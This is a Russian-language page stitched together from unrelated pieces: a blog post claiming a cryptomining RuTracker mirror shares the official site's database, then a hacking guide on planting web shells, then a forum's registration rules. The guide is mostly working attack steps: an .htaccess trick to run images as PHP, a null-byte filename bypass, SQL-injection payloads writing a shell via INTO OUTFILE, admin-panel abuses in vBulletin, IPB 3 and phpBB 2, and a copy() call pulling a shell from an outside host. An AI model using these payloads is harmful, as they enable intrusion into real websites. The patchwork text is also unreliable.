Вредоносное ПО (malware) - это назойливые или опасные программы,...
Я писал о том, что при попытке залогиниться на одном из зеркал RuTracker, выдается сообщение о том, что это возможно лишь с тем условием, если вы разрешите сайту выполнять вычисления на вашем компьютере, другими словами - майнить криптовалюту.
После этого, мне в комментарии посыпались гневные сообщения о том, что я на самом деле дурак, а описываемые мною зеркала не принадлежат рутрекеру и никоим образом они не связаны с самим рутрекером. Я не сильно придавал этому значения и в комментариях к той заметке задал вопрос, а как же быть с тем, что зеркало rutracker-org.appspot.com повторяет не только дизайн официального сайта рутрекера rutracker.org , но и полностью повторяет его содержимое. Однако в ответ на это я услышал что, цитирую: "Дурак ты Волох и ничего не понимаешь ".
Как и подобает здравомыслящему человеку - он начинает задумываться над следующим: если мне говорят что я дурак, то может быть так оно и есть? Я тоже так подумал, оказалось что нет - в этой ситуации я не дурак. Но обо всем по порядку.
После того, как в комментариях админы RuTracker начали говорить о том, что:
Других зеркал и "дочерних проектов" у нас нет! Все остальные "клоны" рутрекера, дублирующие нашу структуру и дизайн, к нам никакого отношения не имеют, их использование может привести к краже паролей, задействованию вашего компьютера для майнинга криптовалют и иным неприятностям! Мэйнтрекер - это также фейк!!
Я стал задумываться, может быть действительно я погорячился и зря наговариваю на ребят из RuTracker. Ладно, я решил сравнить комментарии с официального сайта RuTracker - rutracker.org и комментарии с зеркала рутрекера rutracker-org.appspot.com , который запрашивал разрешение на генерацию криптовалюты. Оказалось, что комментарии полностью идентичные. Но мне же никто не поверит - решил я, и хотел сделать скриншоты. Но и эта затея показалась глупой, т.к. комментарии легко удаляются и редактируются.
Самой лучшей идеей стала запись видео. Смотрим, а потом я прокомментрирую что тут происходит:
Посмотрели? Сразу скажу, что видео выставляю "как оно есть", то есть без монтажа. Поэтому оно без каких-либо комментариев или озвучки. Итак, давайте разберемся что тут происходит.
Для начала я создал почтовый ящик, чтобы зарегаться на сайте rutracker-org.appspot.com . Да, именно на том сайте, который майнит криптовалюту. Почему именно на нем, а не на официальном сайте rutracker.org ? Дело в том, что передо мной стояла задача показать то, что у сайтов rutracker-org.appspot.com и rutracker.org одна база данных, то есть эти сайты между собой взаимосвязаны вопреки заявлениям админов рутрекера.
После того, как я завел почту, я открыл браузер Tor и загрузил три вкладки:
1. Официальный сайт rutracker.org ;
2. Зеркало RuTracker rutracker-org.appspot.com ;
3. Вкладку с открытым почтовым ящиком.
После этого, на зеркале RuTracker rutracker-org.appspot.com я произвел регистрацию (Time 00:25) и в мой почтовый ящик пришло письмо с активацией учетной записи (Time 00:57). И вот здесь уже начинается интересные танцы, точнее жуткие пляски с подгоранием пятой точки админов сайта: в коде активации указана ссылка на официальный сайт трекера (Time 1:00):
https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF
Эта ссылка рабочая и она ведет именно на официальной сайт rutracker.org . Перейдя по ссылке, учетная запись, созданная на зеркале rutracker-org.appspot.com успешно активировалась на официальном сайте rutracker.org (Time 1:06). Во чудеса техники и админской чудо-мысли. Кажется у админов сайта начинает что-то дымиться. Да и ладно, я же дурак как они сказали, что с меня взять. Идем дальше.
После успешной активации учетной записи, я отправляюсь на зеркало rutracker-org.appspot.com и произвожу попытку залогиниться на сайте (Time 1:45). После ввода капчи, я успешно захожу под созданной учетной записью на "неофициальном" трекере (Time 2:03). И в этот момент появляется то самое уведомление (Time 2:07):
Я нажимаю на кнопку "Разрешить" (Time 2:08), так как в противном случае я бы не смог залогиниться. После этого, показываю, что личка пуста и я еще не оставлял никаких комментариев (Time 2:20).
Теперь, для того, чтобы показать взаимосвязь зеркала и официального сайта, я выбираю рандомную раздачу на сайте rutracker-org.appspot.com и оставляю комментарий (Time 3:10). После чего, на официальном сайте rutracker.org произвожу попытку залогиниться (Time 3:40) с учетной записью, созданной на зеркале рутрекера. И о чудо - логин и пароль от "неофициального" зеркала подошел к официальному сайту (Time 4:00). Совпадение? Не думаю.
Идем дальше, открываем список сообщений, оставленных на трекере и что мы видим: знакомая раздача в списке тем (Time 4:05). Наверное тоже совпадение и для пущей убедительности открываю оставленный мною комментарий к этой раздаче на непризнаваемом админами зеркале (Time 4:17).
Сравниваем комментарий к раздаче с сайта rutracker-org.appspot.com и rutracker.org (Time 5.54) и еще раз убеждаемся в том, что эти два сайта взаимосвязаны.
А что мне писали админы сайта? Кажется они убеждали меня в том, что официальный сайт и зеркало rutracker-org.appspot.com никак между собой не взаимосвязаны. В комментариях админов трекера четко говорится о том, что все зеркала просто лишь дублируют структуру и дизайн сайта, но не связаны между собой. Однако из увиденного получается, что официальный сайт копирует комментарии с какого-то левого зеркала? Да нет, тоже бред. А где же истина? Истина в том, что у этих двух сайтов одна база данных, а зеркал множество, одни из которых признаются админами трекера, а другие не признаются и используются для генерации криптовалюты.
Получается что все это время, мне в комментариях пытались лить в уши какую-то ахинею и убеждать меня в том, что я якобы зашел совсем на левый сайт, а на деле оказалось что этот сайт также принадлежит RuTracker.
Подозреваю, что сейчас у некоторых людей начнется синдром воспламенения пятой точки и посыпятся угрозы, оскорбления и т.п. А ведь я уже и вправду подумал, что зря наезжаю на ребят и они ни в чем не виноваты. Оказалось все совсем иначе и видео тому доказательство. Как сказал коллега: RuTracker - ты был мне как брат .
Привет %username% и его друзья. Ну вот нужно срочно залить шелл на сайт, ну мало ли, может конечный гонорар от этого зависит. Ну а никак не получается. Вот собрал пару примеров (спасибо tracy и другим за это).
Льем шелл через картинку
Вы взломали сайт (разумеется только тестируете) с самописной админкой… И не можете залит веб-шелл, но там присутствует заливка картинок и загружает только форматы.jpg, .gif, .png.
Что в этом случаем можно сделать?
Пихаем шелл с расширением.gif в какую нибудь папку с картинками, и создаем файл.htaccess с содержимым
AddType application/x-httpd-php .gif
Данная команда выполнит формат.gif как php
Пробуем открыть /shell.gif
Так же, если скрипт не равнодушен к переносу строки, пробуем залить шелл попутно переименовав его в shell.php%00.jpg , проверять доступность shell.php, а вдруг?
Способ заливки шелла через mysql.user из скули
1)Узнаем из под кого мы сидим и узнаем так же его права к mysql.
site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Узнаем под кем мы сидим)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user="наш юзер
"+--+
(Проверим привилегии нашего юзера. Если выдаёт ошибку при выводе, можно похексить нашего юзера 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+"Путь до файла
"+--+
(Заливаем мини-шелл)
P.S
Что бы всё получилось нужно имееть права на запись и знать полный путь до корня.
Так же проверить права на запись можно так:
site.com/index.php?id=1+and+1=0+union+Select+1,"prava
",3+from+mysql.user+--+
Если prava отобразится, то права есть.
Следующая ситуация. Мы в админке форумного движка vBulletin
Заходим:
Plugins & Products -> Plugin Manager ->
Плагины & Продукты -> Менеджер плагинов -> [Добавить новый плагин]
Выбираем темптлей. Обычно выбирают faq_complete, выбираем и жмем галочку Plugin is Active выставляем «Yes» и сохраняем.
localhost/forum/faq.php?cmd=phpinfo();
Если мы вывели phpinfo() то считайте шелл у нас в руках.
Далее в phpinfo нужно найти полный путь до форума (например /home/u0000/site.ru/www/sell.php)
. Далее нам нужно наш веб-шелл превратить в txt файл и залить на любой сайт
mysite.com/shell.txt
Шелл заливаем командой
localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что делает эта команда? Она копирует содержимое переменной [a] в переменную [b], то есть shell.txt копирует в shell.php
Заливаем шелл в IPB 3
Заходим:
Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос
Код:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
Полный путь можно посмотреть так:
Админка->Поддержка
Там будет сверху написана версия PHP и слева ссылка на PHPINFO
Шелл тут:
http://site.com/uploads/shell.php
Заливаем шелл в phpBB 2
1. Создаём файл ex.sql
2. Прописываем туда
UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Где user_id=2 — идентификатор администратора
3. Заходим в админ-панель
4. В админ-панеле выбираем пункт «Восстановить БД» и загружаем ex.sql
5. Выполняем код / Заливаем шелл так
Заходим:
http://target/profile.php?mode=editprofile&e=phpinfo();
После:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
Что бы вывести phpinfo() нужно быть авторизованным.
Это только коротенький список, как и на какие движки можно залить шелл. Нужно больше? Welcome к ребятам на rdot
заливка на форумы
заливка на cms
А вот и мой любимый шелл, тоже на rdot))
Регистрируясь на этом форуме Вы подтверждаете факт своего совершеннолетия. Хотя администраторы и модераторы этого форума стараются удалять или редактировать неприемлемые сообщения как можно быстрее, все сообщения просмотреть невозможно. Таким образом Вы признаёте, что сообщения на этом форуме отражают точки зрения их авторов, а не администрации форума (кроме сообщений, размещённых её представителями) и администрация не может быть ответственна за их содержание. Вы признаёте, что этот форум не является средством массовой информации и всё написанное на форуме адресовано только узкому кругу зарегистрированных на нём лиц (участникам форума), вся переписка носит частный характер и является частью личной жизни участников.
Вы обязуетесь уважительно общаться с участниками форума, соблюдая нормы поведения в общественном месте и незнакомыми людьми, максимально соблюдая нормы этикета и морали, правила русского языка, избегая крупных шрифтов, больших изображений, выделения цветом, флейма, флуда, избыточного форматирования и цитирования. Сообщения в нарушение этих норм, могут быть отредактированы, перемещены или удалены администрацией по своему усмотрению, без уведомления и объяснения причин. Для прямого обращения к администрации Вы обязуетесь использовать только личные сообщения или e-mail. Каждая Ваша публикация на форуме читается сотнями участников, поэтому Вы обязуетесь избегать прямой личной переписки внутри форума и создания тем, обращенных к какому-то участнику конкретно. Вы обязуетесь писать объективно и только по теме! Во избежание повторного создания и обсуждения тем Вы обязуетесь просматривать предварительно соответствующие разделы, высказываться только по теме и в соответствии с разделом, использовать поиск по форуму.
Вы соглашаетесь не размещать оскорбительных, угрожающих, недостоверных, клеветнических сообщений, нецензурных слов, порнографических сообщений, призывов к национальной, религиозной розни и прочих сообщений, могущих нарушить соответствующие законы. Попытки размещения таких сообщений могут привести к Вашему немедленному отключению от форумов (при этом Ваш провайдер будет поставлен в известность). IP адреса всех сообщений сохраняются и могут быть опубликованы для возможности проведения такой политики. Вы соглашаетесь с тем, что администраторы форума имеют право без предупреждений и уведомлений удалить, отредактировать, перенести или закрыть любую тему в любое время по своему усмотрению. При обнаружении на форуме сообщений, противоречащих законам Российской Федерации, Вы обязуетесь немедленно связаться с администрацией и поставить ее в известность о появлении таких сообщений, используя внутреннюю для передачи заголовка (темы) противоречащего законам РФ сообщения. Как пользователь Вы согласны с тем, что введённая Вами информация будет храниться в базе данных. Хотя эта информация не будет открыта третьим лицам без Вашего разрешения, администрация форумов не может быть ответственна за действия хакеров, которые могут привести к несанкционированному доступу к ней.
Пользователям форума с количеством сообщений менее 8 (новичкам) не разрешено публиковать ссылки и вставлять изображения. Эти форумы используют cookies для хранения информации на Вашем компьютере. Эти cookies не содержат никакой информации из введённой вами и служат лишь для улучшения качества работы форумов. Ваш e-mail адрес используется лишь для подтверждения Вашей регистрации и пароля (и для высылки нового пароля если Вы забудете текущий). Вы соглашаетесь также с тем, что все эти условия участия в форуме могут быть в будущем скорректированы администрацией или изменены.
